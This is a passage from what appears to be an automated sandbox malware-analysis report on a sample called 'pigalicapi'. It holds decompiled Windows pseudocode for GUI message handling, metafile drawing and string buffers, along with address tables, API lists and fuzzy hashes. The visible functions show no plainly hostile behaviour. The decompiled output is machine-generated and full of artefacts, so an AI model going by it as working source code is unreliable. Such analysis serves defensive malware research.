                                                                                                                                                                                                                                                                                          							_v28 = 0;
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t80 + 4), 0x417, _t78,  &_v28);
                                                                                                                                                                                                                                                                                          							if((_v20 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          								 *(_t80 + 0x8c) = _t78 | 0xffff0000;
                                                                                                                                                                                                                                                                                          								_t57 =  *((intOrPtr*)(_t80 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          								if(_t57 >= 0) {
                                                                                                                                                                                                                                                                                          									_t80 =  *( *((intOrPtr*)(_t80 + 8)) + _t57 * 4);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t80 = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t78 = PostMessageA;
                                                                                                                                                                                                                                                                                          								PostMessageA(_t80, 0x202, 0, (_v32 & 0x0000ffff) << 0x00000010 | _v36 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          								PostMessageA(_t80, 0x100, 0x1b, 0);
                                                                                                                                                                                                                                                                                          								 *_t63 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t85 = _v32 -  *0x880bc4; // 0xffffffff
                                                                                                                                                                                                                                                                                          				if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                                          0x0080f2d0
                                                                                                                                                                                                                                                                                          0x0080f2d6
                                                                                                                                                                                                                                                                                          0x0080f2dd
                                                                                                                                                                                                                                                                                          0x0080f2e2
                                                                                                                                                                                                                                                                                          0x0080f2e4
                                                                                                                                                                                                                                                                                          0x0080f2ea
                                                                                                                                                                                                                                                                                          0x0080f2f0
                                                                                                                                                                                                                                                                                          0x0080f2f1
                                                                                                                                                                                                                                                                                          0x0080f2fe
                                                                                                                                                                                                                                                                                          0x0080f301
                                                                                                                                                                                                                                                                                          0x0080f304
                                                                                                                                                                                                                                                                                          0x0080f40b
                                                                                                                                                                                                                                                                                          0x0080f411
                                                                                                                                                                                                                                                                                          0x0080f417
                                                                                                                                                                                                                                                                                          0x0080f423
                                                                                                                                                                                                                                                                                          0x0080f434
                                                                                                                                                                                                                                                                                          0x0080f434
                                                                                                                                                                                                                                                                                          0x0080f30a
                                                                                                                                                                                                                                                                                          0x0080f30d
                                                                                                                                                                                                                                                                                          0x0080f317
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080f322
                                                                                                                                                                                                                                                                                          0x0080f33d
                                                                                                                                                                                                                                                                                          0x0080f342
                                                                                                                                                                                                                                                                                          0x0080f348
                                                                                                                                                                                                                                                                                          0x0080f359
                                                                                                                                                                                                                                                                                          0x0080f35b
                                                                                                                                                                                                                                                                                          0x0080f373
                                                                                                                                                                                                                                                                                          0x0080f37b
                                                                                                                                                                                                                                                                                          0x0080f38f
                                                                                                                                                                                                                                                                                          0x0080f392
                                                                                                                                                                                                                                                                                          0x0080f395
                                                                                                                                                                                                                                                                                          0x0080f398
                                                                                                                                                                                                                                                                                          0x0080f39b
                                                                                                                                                                                                                                                                                          0x0080f3a9
                                                                                                                                                                                                                                                                                          0x0080f3b3
                                                                                                                                                                                                                                                                                          0x0080f3bb
                                                                                                                                                                                                                                                                                          0x0080f3c4
                                                                                                                                                                                                                                                                                          0x0080f3c5
                                                                                                                                                                                                                                                                                          0x0080f3ce
                                                                                                                                                                                                                                                                                          0x0080f3c7
                                                                                                                                                                                                                                                                                          0x0080f3c7
                                                                                                                                                                                                                                                                                          0x0080f3c7
                                                                                                                                                                                                                                                                                          0x0080f3d9
                                                                                                                                                                                                                                                                                          0x0080f3ed
                                                                                                                                                                                                                                                                                          0x0080f3f9
                                                                                                                                                                                                                                                                                          0x0080f3fb
                                                                                                                                                                                                                                                                                          0x0080f3fb
                                                                                                                                                                                                                                                                                          0x0080f3b3
                                                                                                                                                                                                                                                                                          0x0080f37b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080f35b
                                                                                                                                                                                                                                                                                          0x0080f34d
                                                                                                                                                                                                                                                                                          0x0080f353
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$ClientPostScreenSend$CountFromItemMenuPointWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 407895249-0
                                                                                                                                                                                                                                                                                          • Opcode ID: da727766392685cb635dcdb038027ce5bba874ff3a880c69e314ee6d06be3f8e
                                                                                                                                                                                                                                                                                          • Instruction ID: 5617d554a62be23316903013c30cd86eb56d51295f7bf4956312ea1529e5d6f2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da727766392685cb635dcdb038027ce5bba874ff3a880c69e314ee6d06be3f8e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF419C719006189FDB60CF68DC84BAFBBF8FB84710F108529EA55E7681D774A841CF65
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                                                                                                                          			E008069C0(void* __ebx, RECT* __edi, struct HDC__* _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				struct tagENHMETAHEADER _v172;
                                                                                                                                                                                                                                                                                          				intOrPtr _v176;
                                                                                                                                                                                                                                                                                          				intOrPtr _v180;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _v184;
                                                                                                                                                                                                                                                                                          				int _v188;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F175);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t31 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_t32 = _t31 ^ _t75;
                                                                                                                                                                                                                                                                                          				_v24 = _t32;
                                                                                                                                                                                                                                                                                          				_push(_t72);
                                                                                                                                                                                                                                                                                          				_push(_t32);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v184 =  *(__ebx + 8);
                                                                                                                                                                                                                                                                                          				_v180 = 0;
                                                                                                                                                                                                                                                                                          				_v176 = 0;
                                                                                                                                                                                                                                                                                          				E00816820( &_v172, 0, 0x6c);
                                                                                                                                                                                                                                                                                          				_v172.iType = 1;
                                                                                                                                                                                                                                                                                          				_v172.nSize = 0x6c;
                                                                                                                                                                                                                                                                                          				GetEnhMetaFileHeader(_v184, 0x6c,  &_v172);
                                                                                                                                                                                                                                                                                          				asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          				_t73 = _t72 &  &_v172;
                                                                                                                                                                                                                                                                                          				_v188 = MulDiv( *(__ebx + 0x14), __edi->right -  *__edi,  *(_t73 + 0x48));
                                                                                                                                                                                                                                                                                          				OffsetWindowOrgEx(_a4,  ~_v188,  ~(MulDiv( *(__ebx + 0x18), __edi->bottom - __edi->top,  *(_t73 + 0x4c))), 0);
                                                                                                                                                                                                                                                                                          				PlayEnhMetaFile(_a4,  *(__ebx + 8), __edi);
                                                                                                                                                                                                                                                                                          				_push(_v180);
                                                                                                                                                                                                                                                                                          				E008162C2();
                                                                                                                                                                                                                                                                                          				_push(_v176);
                                                                                                                                                                                                                                                                                          				_t51 = E008162C2();
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t74);
                                                                                                                                                                                                                                                                                          				return E008159E6(_t51, __ebx, _v24 ^ _t75, _a4, __edi, _t74);
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x008069c3
                                                                                                                                                                                                                                                                                          0x008069c5
                                                                                                                                                                                                                                                                                          0x008069d0
                                                                                                                                                                                                                                                                                          0x008069d7
                                                                                                                                                                                                                                                                                          0x008069dc
                                                                                                                                                                                                                                                                                          0x008069de
                                                                                                                                                                                                                                                                                          0x008069e1
                                                                                                                                                                                                                                                                                          0x008069e2
                                                                                                                                                                                                                                                                                          0x008069e6
                                                                                                                                                                                                                                                                                          0x008069ee
                                                                                                                                                                                                                                                                                          0x008069fe
                                                                                                                                                                                                                                                                                          0x00806a04
                                                                                                                                                                                                                                                                                          0x00806a0a
                                                                                                                                                                                                                                                                                          0x00806a10
                                                                                                                                                                                                                                                                                          0x00806a28
                                                                                                                                                                                                                                                                                          0x00806a32
                                                                                                                                                                                                                                                                                          0x00806a3c
                                                                                                                                                                                                                                                                                          0x00806a47
                                                                                                                                                                                                                                                                                          0x00806a51
                                                                                                                                                                                                                                                                                          0x00806a6b
                                                                                                                                                                                                                                                                                          0x00806a8f
                                                                                                                                                                                                                                                                                          0x00806a9e
                                                                                                                                                                                                                                                                                          0x00806aaa
                                                                                                                                                                                                                                                                                          0x00806aab
                                                                                                                                                                                                                                                                                          0x00806ab6
                                                                                                                                                                                                                                                                                          0x00806ab7
                                                                                                                                                                                                                                                                                          0x00806ac2
                                                                                                                                                                                                                                                                                          0x00806aca
                                                                                                                                                                                                                                                                                          0x00806ad8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00806A10
                                                                                                                                                                                                                                                                                          • GetEnhMetaFileHeader.GDI32(?,0000006C,?,?,DA7E2511), ref: 00806A3C
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 00806A5C
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 00806A77
                                                                                                                                                                                                                                                                                          • OffsetWindowOrgEx.GDI32(?,DA7E2511,00000000,00000000,?,DA7E2511), ref: 00806A8F
                                                                                                                                                                                                                                                                                          • PlayEnhMetaFile.GDI32(?,?), ref: 00806A9E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileMeta$HeaderOffsetPlayWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                                                                                          • API String ID: 3114738026-2517025534
                                                                                                                                                                                                                                                                                          • Opcode ID: a8a9eb2cf4f7980960556ce35b27f0309349f82105c149c7c2af8eccba4160d4
                                                                                                                                                                                                                                                                                          • Instruction ID: 5052c35a9eb53dc0dff12db516d3c4f895c2aece57fb563dc0bf04a97c4196ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8a9eb2cf4f7980960556ce35b27f0309349f82105c149c7c2af8eccba4160d4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8314FB1A00214EFDB14DF64DC45FAAB7B9FF48300F008299E949D7281DB30A994CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00811120(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                                          				signed int _v88;
                                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t36 = GetParent( *(_a4 + 4));
                                                                                                                                                                                                                                                                                          				_t19 = SendMessageA(_t36, 0x40c, 0, 0);
                                                                                                                                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = _t19;
                                                                                                                                                                                                                                                                                          				if(_t19 <= 0) {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                                          						_v96 = 0x50;
                                                                                                                                                                                                                                                                                          						_v92 = 0x11;
                                                                                                                                                                                                                                                                                          						E00816820( &_v88, 0, 0x48);
                                                                                                                                                                                                                                                                                          						_t39 = _t39 + 0xc;
                                                                                                                                                                                                                                                                                          						if(SendMessageA(_t36, 0x41d, _t37,  &_v96) != 0 && _v64 ==  *(_a4 + 4)) {
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                                                                                                                                          						if(_t37 < _v12) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							L4:
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v88 & 0x00000200) == 0) {
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						PostMessageA(_t36, 0x42b, _t37, 0);
                                                                                                                                                                                                                                                                                          						PostMessageA( *(_a4 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x00811140
                                                                                                                                                                                                                                                                                          0x00811148
                                                                                                                                                                                                                                                                                          0x0081114c
                                                                                                                                                                                                                                                                                          0x0081114e
                                                                                                                                                                                                                                                                                          0x00811153
                                                                                                                                                                                                                                                                                          0x008111e3
                                                                                                                                                                                                                                                                                          0x00811159
                                                                                                                                                                                                                                                                                          0x00811159
                                                                                                                                                                                                                                                                                          0x00811161
                                                                                                                                                                                                                                                                                          0x00811168
                                                                                                                                                                                                                                                                                          0x0081116f
                                                                                                                                                                                                                                                                                          0x00811174
                                                                                                                                                                                                                                                                                          0x00811186
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00811193
                                                                                                                                                                                                                                                                                          0x00811197
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00811199
                                                                                                                                                                                                                                                                                          0x00811199
                                                                                                                                                                                                                                                                                          0x008111a1
                                                                                                                                                                                                                                                                                          0x008111a1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00811197
                                                                                                                                                                                                                                                                                          0x008111ab
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008111ad
                                                                                                                                                                                                                                                                                          0x008111bc
                                                                                                                                                                                                                                                                                          0x008111ce
                                                                                                                                                                                                                                                                                          0x008111d8
                                                                                                                                                                                                                                                                                          0x008111d8
                                                                                                                                                                                                                                                                                          0x008111ab
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$PostSend$Parent_memset
                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                          • API String ID: 2781538653-3110715001
                                                                                                                                                                                                                                                                                          • Opcode ID: 887b9a18f35fe769642e71f14e017c8f8a7fe5e0f160d944a8ef158dec5edf60
                                                                                                                                                                                                                                                                                          • Instruction ID: 8bd98b0a0d245e55fc5b275c1c2ab652e0eec54a04fb2f6d309a5cb3e7eeceb8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 887b9a18f35fe769642e71f14e017c8f8a7fe5e0f160d944a8ef158dec5edf60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3221A772A4021877D710DB99DC85FEAF7ACEB49710F108016FB04AB281D6B1A845CBE5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                          			E008021A0(CHAR* __ecx, signed int __edx, struct HINSTANCE__* _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v1048;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _v1052;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _v1056;
                                                                                                                                                                                                                                                                                          				CHAR* _v1060;
                                                                                                                                                                                                                                                                                          				CHAR* _v1064;
                                                                                                                                                                                                                                                                                          				signed int _v1068;
                                                                                                                                                                                                                                                                                          				char _v1072;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v1076;
                                                                                                                                                                                                                                                                                          				void* _v1096;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t65;
                                                                                                                                                                                                                                                                                          				int _t70;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t81;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t85;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t95;
                                                                                                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t101;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t103;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t120;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				char* _t122;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t124;
                                                                                                                                                                                                                                                                                          				void* _t125;
                                                                                                                                                                                                                                                                                          				struct HRSRC__ _t126;
                                                                                                                                                                                                                                                                                          				signed int _t127;
                                                                                                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t129;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t130;
                                                                                                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          				char* _t133;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t115 = __edx;
                                                                                                                                                                                                                                                                                          				_t104 = __ecx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081FBB6);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t133 = _t132 - 0x428;
                                                                                                                                                                                                                                                                                          				_t61 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_t62 = _t61 ^ _t131;
                                                                                                                                                                                                                                                                                          				_v24 = _t62;
                                                                                                                                                                                                                                                                                          				_push(_t62);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t133;
                                                                                                                                                                                                                                                                                          				_t101 = _a4;
                                                                                                                                                                                                                                                                                          				_t120 = 0;
                                                                                                                                                                                                                                                                                          				_v1060 = _a8;
                                                                                                                                                                                                                                                                                          				_v1064 = __ecx;
                                                                                                                                                                                                                                                                                          				_t124 = 0;
                                                                                                                                                                                                                                                                                          				_v1056 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v1068 = __edx;
                                                                                                                                                                                                                                                                                          				_v1072 = 0;
                                                                                                                                                                                                                                                                                          				_v1052 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				if(_t101 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					if(_v1052 !=  &_v1048) {
                                                                                                                                                                                                                                                                                          						E0080D040( &_v1052);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t120 != _t124) {
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							_t126 = _t120->i;
                                                                                                                                                                                                                                                                                          							_v1056 = _t126;
                                                                                                                                                                                                                                                                                          							E00815DE2(_t120);
                                                                                                                                                                                                                                                                                          							_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          							if(_t126 == 0) {
                                                                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t120 = _v1056;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                                                                                                          					_t65 = 0x8007000e;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t70 = lstrlenW(_t101);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_t127 = _t70 + 1;
                                                                                                                                                                                                                                                                                          					_t115 = (_t115 << 0x00000020 | _t127) << 1;
                                                                                                                                                                                                                                                                                          					_t128 = _t127 + _t127;
                                                                                                                                                                                                                                                                                          					_t73 = _t128 + 0x80000000;
                                                                                                                                                                                                                                                                                          					asm("adc edx, edi");
                                                                                                                                                                                                                                                                                          					_v1076 = _t115;
                                                                                                                                                                                                                                                                                          					if(_t73 != 0 || _t73 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						_t74 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t128 > 0x400) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							__eflags = (_t73 | 0xffffffff) - _t128 - 8;
                                                                                                                                                                                                                                                                                          							if((_t73 | 0xffffffff) - _t128 < 8) {
                                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t20 = _t128 + 8; // 0x9
                                                                                                                                                                                                                                                                                          								_t95 = E00815E1C(_t115, _t120, _t128, _t20);
                                                                                                                                                                                                                                                                                          								_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          								__eflags = _t95;
                                                                                                                                                                                                                                                                                          								if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *_t95 = 0;
                                                                                                                                                                                                                                                                                          									_v1056 = _t95;
                                                                                                                                                                                                                                                                                          									_t22 = _t95 + 8; // 0x8
                                                                                                                                                                                                                                                                                          									_t122 = _t22;
                                                                                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t73 = E00801030(_t104, _t115, _t128);
                                                                                                                                                                                                                                                                                          							_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								E0081ACA0(_t128);
                                                                                                                                                                                                                                                                                          								_v20 = _t133;
                                                                                                                                                                                                                                                                                          								_t122 = _t133;
                                                                                                                                                                                                                                                                                          								L9:
                                                                                                                                                                                                                                                                                          								if(_t122 == 0) {
                                                                                                                                                                                                                                                                                          									_t120 = _v1056;
